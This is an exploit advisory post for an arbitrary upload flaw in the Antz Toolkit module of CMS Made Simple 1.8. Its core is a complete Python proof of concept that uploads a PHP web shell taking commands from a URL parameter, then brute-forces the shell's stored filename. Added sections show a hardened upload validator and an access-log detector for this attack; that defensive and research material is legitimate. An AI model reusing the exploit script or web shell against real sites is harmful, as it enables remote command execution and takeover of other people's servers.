
Sunday, July 11, 2010

CMS Made Simple 1.8 Antz Toolkit 1.02 Module Arbitrary Upload

An arbitrary upload vulnerability in the Antz Toolkit 1.02 module for CMS Made Simple 1.8 can be exploited to upload a PHP shell. The module's include.php accepts a multipart/form-data file upload without restricting the file type, so a .php file is written under modules/antz/tmp/ where the web server will execute it. The PoC below uploads the shell and then brute-forces the numeric prefix the module prepends to the stored name.
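The following is an added example, not code from this post or from the Antz Toolkit module (which is PHP). It models, in Python, the checks a hardened upload handler should apply to a request body shaped like the PoC's: parse the multipart parts, allowlist the extension, verify the content matches the declared type, refuse anything carrying PHP tags, and store under a server-chosen random name instead of the client's. The two sample bodies are constructed for the example; PNG_UPLOAD is the benign case that must still be accepted.

```python
import re
import secrets

# Constructed multipart/form-data body with the same shape as the PoC request:
# an empty antzSeed field and a file part named shell_file carrying PHP code.
BOUNDARY = b'----x'
PHP_UPLOAD = (
    b'------x\r\n'
    b'Content-Disposition: form-data; name="antzSeed"\r\n'
    b'\r\n'
    b'\r\n'
    b'------x\r\n'
    b'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
    b'Content-Type: application/octet-stream\r\n'
    b'\r\n'
    b"<?php echo '<pre>' . system($_GET['CMD']) . '</pre>'; ?>\r\n"
    b'------x--\r\n'
)

# Constructed benign variant: same field layout, a .png name and a real PNG header.
PNG_UPLOAD = PHP_UPLOAD.replace(
    b'filename="shell.php"', b'filename="logo.png"'
).replace(
    b"<?php echo '<pre>' . system($_GET['CMD']) . '</pre>'; ?>",
    b'\x89PNG\r\n\x1a\n' + b'\x00' * 16,
)

# extension -> magic bytes the content must start with
ALLOWED = {
    'png': b'\x89PNG\r\n\x1a\n',
    'jpg': b'\xff\xd8\xff',
    'gif': b'GIF8',
}


def parse_multipart(body, boundary):
    """Split a multipart/form-data body into (headers, data) pairs, one per part."""
    delim = b'--' + boundary
    parts = []
    for raw in body.split(delim)[1:]:
        if raw.startswith(b'--'):          # closing delimiter: boundary + "--"
            break
        raw = raw[2:]                      # CRLF that follows the delimiter line
        head, _, data = raw.partition(b'\r\n\r\n')
        headers = {}
        for line in head.split(b'\r\n'):
            if b':' in line:
                key, value = line.split(b':', 1)
                headers[key.strip().lower().decode()] = value.strip().decode()
        if data.endswith(b'\r\n'):         # CRLF before the next delimiter is not payload
            data = data[:-2]
        parts.append((headers, data))
    return parts


def disposition_params(value):
    """'form-data; name="f"; filename="x.png"' -> {'name': 'f', 'filename': 'x.png'}"""
    return dict(re.findall(r'(\w+)="([^"]*)"', value))


def validate_upload(filename, data):
    """Return (ok, reason) or (ok, server_chosen_name).

    Every decision is made from the bytes and an allowlist, never from the
    client's Content-Type or from the client-supplied name.
    """
    base = filename.replace('\\', '/').rsplit('/', 1)[-1]   # drop any path components
    if '.' not in base:
        return False, 'no extension'
    ext = base.rsplit('.', 1)[1].lower()
    if ext not in ALLOWED:
        return False, 'extension not allowed: ' + ext
    if not data.startswith(ALLOWED[ext]):
        return False, 'content does not match declared type'
    if b'<?php' in data or b'<?=' in data:                   # polyglot image + PHP
        return False, 'embedded PHP tag'
    # Unpredictable name, single allowlisted extension, nothing from the client.
    return True, secrets.token_hex(16) + '.' + ext


def handle_upload(body, boundary=BOUNDARY):
    """Apply validate_upload() to the file part of a multipart body."""
    for headers, data in parse_multipart(body, boundary):
        params = disposition_params(headers.get('content-disposition', ''))
        if 'filename' in params:
            return validate_upload(params['filename'], data)
    return False, 'no file part'


if __name__ == '__main__':
    print(handle_upload(PHP_UPLOAD))   # rejected: extension not allowed: php
    print(handle_upload(PNG_UPLOAD))   # accepted under a random .png name
```

The server-chosen name matters as much as the extension check: a name like shell.php.png keeps its allowlisted extension but can still be handed to the PHP handler by some Apache mod_mime configurations. Storing uploads outside the web root, or in a directory with PHP execution disabled, is the remaining layer that turns an upload bug into a non-event.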

PoC
import socket

host = 'localhost'
path = '/cmsms'
port = 80

# Multipart boundary used in the upload request.
boundary = '----x'

# PHP web shell written to the module's tmp directory; the command comes from ?CMD=.
shell = "<?php echo '<pre>' . system($_GET['CMD']) . '</pre>'; ?>"


def build_body():
    # multipart/form-data body: an empty antzSeed field and the file part.
    parts = [
        '--' + boundary,
        'Content-Disposition: form-data; name="antzSeed"',
        '',
        '',
        '--' + boundary,
        'Content-Disposition: form-data; name="shell_file"; filename="shell.php"',
        'Content-Type: application/octet-stream',
        '',
        shell,
        '--' + boundary + '--',
        '',
    ]
    return '\r\n'.join(parts).encode()


def request(method, target, headers=None, body=b''):
    # One request per connection; Connection: close so recv() sees the whole response.
    s = socket.create_connection((host, port), timeout=8)
    head = '%s %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n' % (method, target, host)
    for name, value in (headers or {}).items():
        head += '%s: %s\r\n' % (name, value)
    head += '\r\n'
    s.sendall(head.encode() + body)
    chunks = []
    try:
        while True:
            chunk = s.recv(8192)
            if not chunk:
                break
            chunks.append(chunk)
    except socket.timeout:
        pass
    finally:
        s.close()
    return b''.join(chunks)


def upload_shell():
    body = build_body()
    resp = request('POST', path + '/include.php', {
        'Content-Type': 'multipart/form-data; boundary=' + boundary,
        'Content-Length': str(len(body)),
    }, body)

    if not resp.startswith(b'HTTP/1.1 200 OK'):
        print('error uploading shell')
        return
    print('shell uploaded')

    # The module stores the upload as <n>shell.php under modules/antz/tmp/. The
    # PoC does not parse <n> out of the response, so it probes candidate names in order.
    print('searching for shell')
    for i in range(0, 9999):
        shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'
        if request('GET', shell_path).startswith(b'HTTP/1.1 200 OK'):
            print('\r\nshell located at http://' + host + shell_path)
            break
        print('.', end='', flush=True)


if __name__ == '__main__':
    upload_shell()
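As an added example (not part of the original post), the detection logic below runs over a constructed Apache access-log excerpt that mirrors the traffic the PoC above produces and flags both halves of the attack: a POST to include.php from a client that then fetches a .php file under modules/antz/tmp/, and the run of 404s the search loop generates while guessing the numeric prefix. The log lines, IP addresses and the probe threshold are made up for the example.

```python
import re
from collections import defaultdict

# Apache combined log format; only the fields the detection needs are captured.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Requests for PHP directly under the module's tmp directory (with or without a query).
TMP_PHP = re.compile(r'/modules/antz/tmp/[^/?]*\.php(\?|$)', re.IGNORECASE)
# The upload endpoint the PoC posts to.
UPLOAD_ENDPOINT = re.compile(r'/include\.php(\?|$)')

# Constructed excerpt modelled on the PoC: one POST to include.php, three misses
# while guessing <n>shell.php, the hit, then a command through the shell. The
# 10.0.0.5 lines are ordinary browsing that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Jul/2010:10:00:00 +0000] "GET /cmsms/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Jul/2010:10:00:01 +0000] "POST /cmsms/include.php HTTP/1.1" 200 312 "-" "x"
10.0.0.9 - - [11/Jul/2010:10:00:01 +0000] "GET /cmsms/modules/antz/tmp/0shell.php HTTP/1.1" 404 209 "-" "-"
10.0.0.9 - - [11/Jul/2010:10:00:01 +0000] "GET /cmsms/modules/antz/tmp/1shell.php HTTP/1.1" 404 209 "-" "-"
10.0.0.9 - - [11/Jul/2010:10:00:02 +0000] "GET /cmsms/modules/antz/tmp/2shell.php HTTP/1.1" 404 209 "-" "-"
10.0.0.9 - - [11/Jul/2010:10:00:02 +0000] "GET /cmsms/modules/antz/tmp/3shell.php HTTP/1.1" 200 45 "-" "-"
10.0.0.9 - - [11/Jul/2010:10:00:05 +0000] "GET /cmsms/modules/antz/tmp/3shell.php?CMD=id HTTP/1.1" 200 98 "-" "-"
10.0.0.5 - - [11/Jul/2010:10:00:07 +0000] "GET /cmsms/modules/antz/images/logo.png HTTP/1.1" 200 4411 "-" "Mozilla/5.0"
"""


def parse(lines):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()


def detect(log_text, probe_threshold=3):
    """Return a list of (client_ip, finding) tuples, in log order.

    Signal 1: a client POSTs to include.php and later receives a non-404 for a
              .php file under modules/antz/tmp/ (upload, then shell retrieval).
    Signal 2: a client accumulates probe_threshold 404s for .php names under
              modules/antz/tmp/ (the PoC's search loop), reported once per client,
              whether or not the upload itself was logged.
    """
    posted = set()
    probes = defaultdict(int)
    findings = []
    for e in parse(log_text.splitlines()):
        ip, method, target, status = e['ip'], e['method'], e['target'], e['status']
        if method == 'POST' and UPLOAD_ENDPOINT.search(target):
            posted.add(ip)
            continue
        if not TMP_PHP.search(target):
            continue
        if status == '404':
            probes[ip] += 1
            if probes[ip] == probe_threshold:
                findings.append((ip, 'probing for uploaded php in modules/antz/tmp/'))
        elif ip in posted:
            findings.append((ip, 'php under modules/antz/tmp/ served after upload: ' + target))
    return findings


if __name__ == '__main__':
    for ip, finding in detect(SAMPLE_LOG):
        print(ip, finding)
```

The search loop is the loud part: up to 9999 sequential 404s under one directory within seconds is visible to any rate-based rule even if the upload POST was never logged, which is why the probe signal does not depend on having seen the POST. On a live server, a 200 for anything ending in .php under modules/antz/tmp/ is itself the incident; that directory has no business serving PHP.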
